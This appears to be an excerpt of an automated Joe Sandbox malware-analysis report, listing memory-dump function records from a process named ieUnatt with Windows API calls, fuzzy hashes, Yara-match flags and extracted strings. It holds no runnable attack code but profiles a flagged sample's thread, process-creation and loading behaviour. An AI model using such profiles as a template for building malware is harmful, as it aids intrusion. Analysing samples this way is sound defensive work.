                                                                                                                                                          • Instruction Fuzzy Hash: 22900221601400466141716888449064405AFE1215755C622B599D551D8559D9B95A66
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 8711df03de044438dfb7598a24794461ae8bee29b0ef04086235251ec6a71f1c
                                                                                                                                                          • Instruction ID: ad7a75c4ef150440df77cca3d2e9ef93f859749525f1a0b6bdd2cf8c27e7bdc7
                                                                                                                                                          • Opcode Fuzzy Hash: 8711df03de044438dfb7598a24794461ae8bee29b0ef04086235251ec6a71f1c
                                                                                                                                                          • Instruction Fuzzy Hash: 80900221211C0046F20175684C14B0704058BD0307F55C616B515D555CC915D9B55922
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: a7a2e63e01a948aa0de7bcec8018dd498d8e93231330a5ada9ce05c72ed06dc4
                                                                                                                                                          • Instruction ID: a3d6fd817569d646ec1368e45e67a60280f6380be73836ae1f801e9895723039
                                                                                                                                                          • Opcode Fuzzy Hash: a7a2e63e01a948aa0de7bcec8018dd498d8e93231330a5ada9ce05c72ed06dc4
                                                                                                                                                          • Instruction Fuzzy Hash: 7C90026134140446F10171584414B060405CBE1305F55C516F606D555D8619DDA66527
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: fe1187f48d47ab783ad3c7599bf6fc46186219b34b78e58db965033e3274511e
                                                                                                                                                          • Instruction ID: fe4d64b680622af6a36c387f3bc8509add5485d761b4bdf545b3a739e3b070a1
                                                                                                                                                          • Opcode Fuzzy Hash: fe1187f48d47ab783ad3c7599bf6fc46186219b34b78e58db965033e3274511e
                                                                                                                                                          • Instruction Fuzzy Hash: 0390022124545106F151715C44046164405ABE0205F55C522B581D595D8555D9A96622
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 2baf9e84e34425911fd7dd770ec6cd3d22f3fc8defd8b6c3d11db07f78e99f66
                                                                                                                                                          • Instruction ID: b002380be8279f639bb32b511a56841c213e9f2b6524c25aad4f41b54ef82f60
                                                                                                                                                          • Opcode Fuzzy Hash: 2baf9e84e34425911fd7dd770ec6cd3d22f3fc8defd8b6c3d11db07f78e99f66
                                                                                                                                                          • Instruction Fuzzy Hash: EC900225211400072106B558070450704468BD5355355C522F601E551CD621D9B55522
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 8dd97df0e4e081f54b08e236960a5c48d185d1b5bf21cb02027314d5fd04bf64
                                                                                                                                                          • Instruction ID: 23583d70cb0577d21dec69e2df25888d11fba643ec95e744325e1b2b632e4b5f
                                                                                                                                                          • Opcode Fuzzy Hash: 8dd97df0e4e081f54b08e236960a5c48d185d1b5bf21cb02027314d5fd04bf64
                                                                                                                                                          • Instruction Fuzzy Hash: D7900225221400062146B558060450B08459BD6355395C516F641F591CC621D9B95722
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 0294353B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: @J7<
                                                                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: @J7<
                                                                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                                                                          APIs
                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02933FE2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02937D3E,00000010,?,?,?,00000044,?,00000010,02937D3E,?,?,?), ref: 029490D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929AF2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929AF2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 66fe20a9da98a457223dee2dc30c0e9bc152a0247b85544eddcb6d8206663a48
                                                                                                                                                          • Instruction ID: 7e53c4b5a86e04460d5c9b42d4a88721c0ba872fc02d9595847383656320030b
                                                                                                                                                          • Opcode Fuzzy Hash: 66fe20a9da98a457223dee2dc30c0e9bc152a0247b85544eddcb6d8206663a48
                                                                                                                                                          • Instruction Fuzzy Hash: 96F092732402143AE230A6A89C42FD7775CDFC1B55F240029F60CEB2C4DEA2B44146F4
                                                                                                                                                          APIs
                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02947CE0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$NameName_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3514427675-0
                                                                                                                                                          • Opcode ID: 59674a61cc737f16b72bfc01262ad3fb2bf4e5aa36473d00480b26c9b1b88e31
                                                                                                                                                          • Instruction ID: 37145e71859980c44d286aa4932e25922d7e6ed9dcb42450b691c4373372986b
                                                                                                                                                          • Opcode Fuzzy Hash: 59674a61cc737f16b72bfc01262ad3fb2bf4e5aa36473d00480b26c9b1b88e31
                                                                                                                                                          • Instruction Fuzzy Hash: 57F039B52002047FDA10EF99DC40EAB77AEEFC9754F008018FA08A7241C670B8148BF5
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(029314B6,?,029450BB,029314B6,0294504F,029450BB,?,029314B6,0294504F,00001000,?,?,00000000), ref: 02948FE9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction ID: be781c62418a0cd28140643f42728e7160078eea310230db250ba5067f0bca0d
                                                                                                                                                          • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction Fuzzy Hash: EFE06D71204204BBDA14EE98DC40FAB37ADEFC8714F104008F908A7241C670B910CBF4
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,029337F9,000000F4), ref: 02949029
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction ID: 1c7cf60984f15e3667c4ee787167714bbc727690e515c2e17cf52596aab45a07
                                                                                                                                                          • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction Fuzzy Hash: AEE0E5B2200214BBD614EF99DC81FAB77ADEFC9711F004419FA08A7241DA70B924CAB8
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02937DA9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: d4e30afd0c358c12d72434dd1035a0bb27107a7d8032385a01a6e12e228f64cd
                                                                                                                                                          • Instruction ID: 2053d5447e35d12fd7fb0f536da2943a9d5b4585acbce4c17c7c74e8e54d2d46
                                                                                                                                                          • Opcode Fuzzy Hash: d4e30afd0c358c12d72434dd1035a0bb27107a7d8032385a01a6e12e228f64cd
                                                                                                                                                          • Instruction Fuzzy Hash: 15E086B124070867EB14A9E8DC86FF6339C8F48B68F184650F96DDF2D1DA78F54246A0
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02937DA9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: e32b57d803266b7a3db74eadc885f6a0515cecda4865c7f8ae4a4548ae6cee48
                                                                                                                                                          • Instruction ID: 21c6ecf922344491c9315c25a2bb0fd7e1d831ad325174c4980c55dba0fea7da
                                                                                                                                                          • Opcode Fuzzy Hash: e32b57d803266b7a3db74eadc885f6a0515cecda4865c7f8ae4a4548ae6cee48
                                                                                                                                                          • Instruction Fuzzy Hash: 9DE020B124060466EB159574CC82FF5371C4F44B2CF144610F5A8CF3D1D735E1034670
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,029317A0,0294798F,0294504F,0293176D), ref: 02937BA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 85699f68776da8b7fcb378b6bbec137ed8f49c4f8c17adf330f066e5fae7177e
                                                                                                                                                          • Instruction ID: f394128dcfa308c201775788ad1d3a48fa741e67ad24a9b00a840fbc70724189
                                                                                                                                                          • Opcode Fuzzy Hash: 85699f68776da8b7fcb378b6bbec137ed8f49c4f8c17adf330f066e5fae7177e
                                                                                                                                                          • Instruction Fuzzy Hash: 5AE086712843156BE301A6B58C0AF45361D5F54B44F158068B5CCEF2D2DA50E0208B91
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,029317A0,0294798F,0294504F,0293176D), ref: 02937BA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 9e3693fbf4695692d98aaa9d7cfb83535e316e56fd49d26c2873089d129ecd00
                                                                                                                                                          • Instruction ID: a8eaa3a3e6d1b30f427cd6cefa25b29937234b1c95ea1f660c19ee1bc6c93e39
                                                                                                                                                          • Opcode Fuzzy Hash: 9e3693fbf4695692d98aaa9d7cfb83535e316e56fd49d26c2873089d129ecd00
                                                                                                                                                          • Instruction Fuzzy Hash: 45D05EB12803087BE640FAE5CC03F86365D9B80B98F058028B94CE72C2DD55F4104AA5
                                                                                                                                                          APIs
                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 02930897
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                          • Instruction ID: a449fc04c45ab2bc86d232dba00188fe061f49e6e2317e58cf931b48ba185816
                                                                                                                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                          • Instruction Fuzzy Hash: 20D0A967B0000C3AAA024584ACC1DFEB72CEB84AA6F004063FB08E2040E62289020AB1
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 6c280327599a6d5a9f526b2f82ac70960b8940d5e38a75a851d30559a8f5bf78
                                                                                                                                                          • Instruction ID: c9c317c926a6812854844b53e141e68fd00f5b62fc58b56fb1f1abb30447c657
                                                                                                                                                          • Opcode Fuzzy Hash: 6c280327599a6d5a9f526b2f82ac70960b8940d5e38a75a851d30559a8f5bf78
                                                                                                                                                          • Instruction Fuzzy Hash: 7CB09B719055C5C9FB11F76046087177D006BD0745F15C562F3038642E4778D1D5E576
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513491170.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_46c0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                          • API String ID: 0-3558027158
                                                                                                                                                          • Opcode ID: b02f8bfbf4e58316130b185ce0de840188b02248a05ad16ac2bd8673047f9ee0
                                                                                                                                                          • Instruction ID: b52753edaef6e83f5b37ed46b50e48910668b511362caa427ec4505402977401
                                                                                                                                                          • Opcode Fuzzy Hash: b02f8bfbf4e58316130b185ce0de840188b02248a05ad16ac2bd8673047f9ee0
                                                                                                                                                          • Instruction Fuzzy Hash: 1B914FF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                          • Opcode ID: da1639a1fff737c04f17fd664ef3b403b59a0c94866e99ce0c132aa50c5296b7
                                                                                                                                                          • Instruction ID: a6bed946307ea666370070272be7bb37a8ccdb26bd3d5bd4c05ba3af2a8addae
                                                                                                                                                          • Opcode Fuzzy Hash: da1639a1fff737c04f17fd664ef3b403b59a0c94866e99ce0c132aa50c5296b7
                                                                                                                                                          • Instruction Fuzzy Hash: 0551EAB1A0411EBFDB15DFAC889097EFBB8BB483457108B69F495D7641E274FE009BA0
                                                                                                                                                          Strings
                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04874742
                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04874725
                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048746FC
                                                                                                                                                          • Execute=1, xrefs: 04874713
